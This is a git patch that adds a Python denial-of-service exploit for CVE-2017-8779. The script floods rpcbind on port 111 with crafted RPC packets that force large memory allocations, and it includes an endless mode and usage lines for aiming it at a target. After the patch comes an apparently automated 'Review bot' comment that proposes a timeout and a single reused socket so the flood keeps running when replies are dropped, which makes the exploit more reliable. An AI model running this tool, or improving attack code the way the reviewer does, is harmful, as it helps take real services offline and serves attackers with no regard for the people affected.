From e20926dc95c834bafc7d7a035617142f1fb2fdd2 Mon Sep 17 00:00:00 2001
From: dash
Date: Fri, 2 Jun 2017 09:28:39 +0200
Subject: [PATCH] CVE-2017-8779
---
 CVE-2017-8779_rpcbomb.py | 83 ++++++++++++++++++++++++++++++++++++++++
 README.md | 5 +++
 2 files changed, 88 insertions(+)
 create mode 100755 CVE-2017-8779_rpcbomb.py
 create mode 100644 README.md
diff --git a/CVE-2017-8779_rpcbomb.py b/CVE-2017-8779_rpcbomb.py
new file mode 100755
index 0000000..61789f9
--- /dev/null
+++ b/CVE-2017-8779_rpcbomb.py
@@ -0,0 +1,83 @@ +#!/usr/bin/env python2 +# +# CVE-2017-8779 aka rpcbomb.py +# python implementation of rpcbomb +# find page of bug author here: https://guidovranken.wordpress.com/ +# original ruby exploit: https://www.exploit-db.com/exploits/41974 +# CVE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8779 +# +# this one comes with loop and single packet, to consume memory over time and not just once +# +# i was not able to observe any sort of crash or alike +# on the testsystem the cpu consumption went up to 50% (1 CPU) +# memory allocation was done +# syslogd reportedly mentions out of memory from rpcbind +# depending on the environment and service offered probably interesting +# +# one packet +# ./rpcbomb.py -t 127.0.0.1 +# +# define memory allocation +# ./rpcbomb.py -t 127.0.0.1 -l 1024 +# +# endless mode +# ./rpcbomb.py -t 127.0.0.1 -e +# +# 2nd June 2017 +# by dash + +import os +import sys +import struct +import socket +import argparse + +def run(args): + + ip = args.ip + paylen = args.malloc + port = args.port + + pkt = struct.pack('!I',0) # xid + pkt += struct.pack('!I',0) # message type CALL + pkt += struct.pack('!I',2) # RPC version 2 + pkt += struct.pack('!I',100000) # Program + pkt += struct.pack('!I',4) # Program version + pkt += struct.pack('!I',9) # Procedure + pkt += struct.pack('!I',0) # Creds AUTH_NULL + pkt += struct.pack('!I',0) # Creds len 0 + pkt += struct.pack('!I',0) # Creds AUTH_NULL + pkt += struct.pack('!I',0) # Creds len 0 + pkt += struct.pack('!I',0) # Program: 0 + pkt += struct.pack('!I',0) # Ver + pkt += struct.pack('!I',4) # Proc + pkt += struct.pack('!I',4) # Argument length + pkt += struct.pack('!I',paylen) # Payloadlen + + while 1: + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.sendto(pkt, (ip, port)) + data, addr = s.recvfrom(16384) + print '.', + sys.stdout.flush() + if not args.endless: + break + + print + print 'Done' + +def main(): + parser_desc = 'rpcbomb - python exploit by dash' + prog_desc = 'portbind 
memory exhaustion exploit' + parser = argparse.ArgumentParser(prog = prog_desc, description=parser_desc) + parser.add_argument("-t","--target",action="store",required=True,help='host to send exploit',dest='ip') + parser.add_argument("-p","--port",action="store",required=False,help='port exploit to send to',dest='port', default=111, type=int) + parser.add_argument("-l","--len",action="store",required=False,help='memory to allocate',dest='malloc',default=4294967295, type=int) + parser.add_argument("-e","--endless",action="store_true",required=False,help='send packets constantly',dest='endless') + + + args = parser.parse_args() + run(args) + +if __name__ == "__main__": + main() diff --git a/README.md b/README.md new file mode 100644 index 0000000..7ebeaf9 --- /dev/null +++ b/README.md @@ -0,0 +1,5 @@ +# Exploits DoS + +CVE-2017-8779 aka rpcbomb.py + +rpcbind 111 memory allocation exploit
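Review bot: `run()` blocks forever on `data, addr = s.recvfrom(16384)` because the UDP socket is never given a timeout, so if the target filters port 111, drops the request, or simply does not reply, the tool hangs after the first packet in both single-shot and `-e` mode. The endless loop also opens a fresh socket on every iteration and never closes it explicitly, relying on garbage collection. I would open one socket before the loop, call `settimeout()`, treat `socket.timeout` on the receive as non-fatal, and close the socket at the end, as below. Separately, `-l` values outside 0..4294967295 make `struct.pack('!I', paylen)` raise `struct.error`, so a range check on `args.malloc` in `main()` would give a clearer error than a traceback. `run()` and `main()` are both fully contained in this hunk.
```python
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.settimeout(2.0)  # do not hang forever when the request is dropped or unanswered
    while 1:
        s.sendto(pkt, (ip, port))
        try:
            data, addr = s.recvfrom(16384)
        except socket.timeout:
            pass  # a missing reply is not an error for this tool; keep sending
        # … unchanged: progress dot, flush, endless check …
    s.close()
```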